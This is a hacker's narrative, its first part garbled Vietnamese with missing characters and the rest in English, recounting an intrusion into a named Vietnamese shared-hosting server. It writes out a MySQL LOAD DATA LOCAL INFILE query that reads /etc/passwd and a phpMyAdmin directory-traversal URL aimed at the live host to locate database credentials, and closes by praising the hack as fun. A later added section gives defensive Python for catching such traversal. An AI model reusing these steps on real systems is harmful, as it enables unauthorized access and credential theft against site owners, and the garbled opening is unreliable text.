-h ni chi thi, dn amatuer lm sao hack ni, ci website ca SGGP l do bn VDC
lm y nh, chuyn nghip cc k, my ch bn xy 3-4 ci g, ci g, h nh ri bc
tng la , bo mt cc k, t trc gi cha bao gi b tn cng g ht.
Ba nh bo h hng khoe. C ci g ran rt nng l tai thng mrro.
Va dt xe v nh, kha ca li, thng mrro lp tc chy ln m my tnh lin, "m kip,
coi ba ci bc tng la n chc c no", thng mrro chi ra. "T te t te", ting
modem gia m khuya nghe nh ting n lc huyn cm, nghe cng vui tai gh.
"www.sggp.org.vn[enter]", trc tin phi xem xem ci website n ra sao . h mt site
tin tc nh bao website khc, vit bng PHP, hihi, tn scriptname cng l tn ting Vit
(doctintuc.php thay v nn l readnews.php), trnh by n gin, khng chuyn nghip
lm c l do c lm t lu, theo nh li ng nh bo ni. Hh, li sp c chuyn
vui, mt website bn ngoi lm thm kiu ny th bn trong chc cng c c vi ba ci
fireware...giy, thng mrro ci.
Ln Netcraft xem th ci server t no, "www.netcraft.com/whats". h mt my ch chy
RedHat Linux 7.2 vi Apache 1.3.23/mod_php4. Hihi, software cng khng c
*up2date* cho lm nh, h cng phi KISS (Keep It Simple, Stupid!), my lo admin
thng tun th theo ci rule ny. Thi k, tnh sau, dn *amatuer* nh thng mrro

khng c thi quen hack bng cc li software h thng, n thch hack bng li ca my
thng admin v programmer *chuyn nghip* hn.
Thao tc vi ba ci URL, n nhanh chng nhn ra website ny dng Oracle lm backend
database. PHP v Oracle, mt s kt hp th v nh. Cha c nhiu kinh nghim hack cc
Oracle database server nhng thng mrro ghi vo file sggp.org.vn.txt thng tin ny khi
cn thit th dng n(hihi, mi mt ln lm chuyn g thng mrro iu ghi li vo mt
file, v ci file m n gp li hm nay chnh l file sggp.org.vn.txt ny).
nmap ch? Khoan vi . Gh thm bn Google t . Thng mrro g vo keyword
VDC Hosting, website ny thu host VDC m, th vn may xem. h, hin ra ngay v
tr th nht: TeleHosting <http://hosting.vnn.vn>. Th gh v chi xem c g th v
khng.
OK, a decent-looking website, neatly laid out. After a few actions, mrro renamed sggp.org.vn.txt to hosting.vnn.vn.txt and added some more information (all of it findable right on the index page and on Netcraft):
- Telehosting: <http://hosting.vnn.vn>
- IP address: 203.162.96.70 (same IP as sggp.org.vn => shared hosting)
- Apache/2.0.47 (Unix) PHP/4.3.0 JRun/4.0 mod_jk/1.2.3-dev on Linux
- Control Panel: <http://hosting.vnn.vn/customers/>
- Demo account: cpvdc2/demo
Hehe, professional indeed, handing out a demo account like that. mrro tried getting into the Control Panel with that account. The Control Panel offered a number of management tools: Update information, Send a request, FTP, FileManager, MySQL, Webmail... Quite a lot. Heh, looks tasty. mrro eagerly jumped in and tried FTP: *Permission denied*. FileManager's turn, same thing. But then the savior arrived: MySQL allowed access, hehe, and it led mrro to phpMyAdmin, the MySQL management toolkit. Consider half the road done, mrro laughed with satisfaction.
mrro had reason to be that confident: with MySQL and phpMyAdmin he could do plenty with this server, simply because he could already run queries on this host. Besides, a phpMyAdmin version as old as this one (2.3.2) would certainly have bugs; who knows, with luck there would be one letting him run commands on the server. Now, search for phpMyAdmin bugs first, or hack MySQL first? Why not do both in parallel, hehe, that would surely pay off better. No sooner thought than done: mrro opened two browser windows (FYI, it's Firefox); in one he jumped into the Bugtraq search with the keyword phpMyAdmin, in the other he logged into phpMyAdmin with the demo account.
Once inside phpMyAdmin, as fast as if pre-programmed, mrro typed the query:
CREATE TABLE test (id INT, text LONGTEXT);
-- Quotes restored from the original (lost in extraction); ESCAPED BY '' keeps backslashes literal.
-- The (text) column list is added here so each line of /etc/passwd lands in the LONGTEXT column;
-- without it the default tab-delimited load would try to put every line into the INT id column.
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS ESCAPED BY '' (text);
SELECT * FROM test;
and hit enter; a screen full of every username on the system appeared right before his eyes, yahoo! Hehe, with this phpMyAdmin mrro would be able to read plenty of files on the system.
Carefully saving this information; now, what's the goal?, mrro asked himself. He had to be able to upload a file, or get the username and password of a user on the system. He started analyzing.
On a shared hosting server like this, there would certainly be cases where the username and password were identical. That was one direction.
The second direction was getting into the database holding the customer data. Once in that database everything would become very easy; it would surely be full of the usernames and passwords mrro was looking for. These *professional* admins would certainly have written their own customer management tool, so all he needed now was the MySQL username and password for that database. And usually that username and password would be stored in some config.php; PHP coders commonly do that. Hehe, the only remaining problem was how to find that file's path.
mrro decided to take the second direction first, simply because it looked more attractive, even though the first seemed easier. Now what next?
Oh wait, first see whether anything turned up over on Bugtraq. OK, there were a few bugs, none looking very serious, seemingly all XSS. He was just about to close the Bugtraq window (mrro doesn't much care for that kind of thing anyway) when one bug caught his eye:
phpMyAdmin XSS Vulnerabilities, Transversal Directory Attack,
Information Encoding Weakness and Path Disclosures
(http://www.securityfocus.com/archive/1/325641).
Path Disclosures and Transversal Directory Attack, hehe, now this is interesting. After saving the link, mrro clicked through to the bug's details. That's it, end of movie! The Transversal Directory attack bug allows listing the contents (files and subfolders) of any folder on the system (precisely, any folder the apache user is allowed to read). Quickly exploiting this bug together with the Path Disclosure, mrro typed
http://hosting.vnn.vn/Admin/db_details_imp...ath=/opt/daiweb
<http://hosting.vnn.vn/Admin/db_details_importdocsql.php?submit_show=true&do=import&docpath=/opt/daiweb>
Hehe, right there in plain sight among a heap of files was one named connect.php, just as mrro had predicted. Apply the LOAD DATA INFILE trick, and done!
--mrro.
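The docpath bug mrro used works because the import page never checked that the requested directory stayed inside the one it was meant to read from. The following is an added example, not code from mrro's write-up or from phpMyAdmin: a containment check of the kind the page was missing, plus a small detector that runs the same check over Apache access-log lines. The docs directory, the log lines and the client addresses are all constructed here; the only value taken from the write-up is the script name and the /opt/daiweb docpath.

```python
"""Added example (not from mrro's write-up or phpMyAdmin): the containment check
the docpath parameter lacked, and a detector that applies it to Apache logs."""
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Hypothetical directory the import page was meant to read from (assumption).
DOCS_ROOT = "/var/www/phpmyadmin/docs"

# Apache combined log: client, timestamp, request target.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def resolve_docpath(user_path, root=DOCS_ROOT):
    """Canonicalise user_path under root; return None if it escapes root.

    posixpath.join discards root when user_path is absolute, which is exactly
    how '/opt/daiweb' walks out of the docs directory, and normpath collapses
    '..' segments; the prefix test after both catches either form.  The
    trailing '/' in the prefix stops '../docs2' from passing as a sibling.
    """
    canonical = posixpath.normpath(posixpath.join(root, user_path))
    if canonical == root or canonical.startswith(root + "/"):
        return canonical
    return None


def find_docpath_escapes(log_lines):
    """Return (client_ip, requested_docpath) for import requests whose
    docpath escapes DOCS_ROOT."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _timestamp, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("db_details_importdocsql.php"):
            continue
        # parse_qs percent-decodes, so %2e%2e%2f arrives here as ../
        for requested in parse_qs(parts.query).get("docpath", []):
            if resolve_docpath(requested) is None:
                findings.append((client, requested))
    return findings


# Constructed log lines in Apache combined format, not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Jun/2003:01:12:03 +0700] "GET /Admin/db_details_importdocsql.php?submit_show=true&do=import&docpath=/opt/daiweb HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Jun/2003:01:12:40 +0700] "GET /Admin/db_details_importdocsql.php?submit_show=true&do=import&docpath=%2e%2e%2f%2e%2e%2fetc HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [12/Jun/2003:01:13:05 +0700] "GET /Admin/db_details_importdocsql.php?submit_show=true&do=import&docpath=schema HTTP/1.1" 200 880 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [12/Jun/2003:01:13:30 +0700] "GET /index.php?docpath=/etc HTTP/1.1" 200 4000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, path in find_docpath_escapes(SAMPLE_LOG):
        print(f"{client} requested docpath outside {DOCS_ROOT}: {path}")
```

Run as-is it reports the two requests from 203.0.113.7 (the absolute path and the percent-encoded `../../etc`) and ignores both the in-tree `schema` request and the unrelated index.php hit. The same resolve-then-prefix-check pattern is what the import page should have applied before touching the filesystem; checking the raw string for `..` alone misses the absolute-path form mrro actually used.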
After reading this write-up, how do you feel? Fun? I found it great fun; I already thought hacking was fun, and this makes it even more so. Real hackers (or people who know how to hack) in Vietnam rarely write the whole thing up this cheerfully after a hack. Huyremy once wrote up the process of hacking HVA, but that wasn't much fun, and besides, Huy only ever wrote that one... Whenever I find another write-up this fun, I'll introduce it to you! Have fun!
The End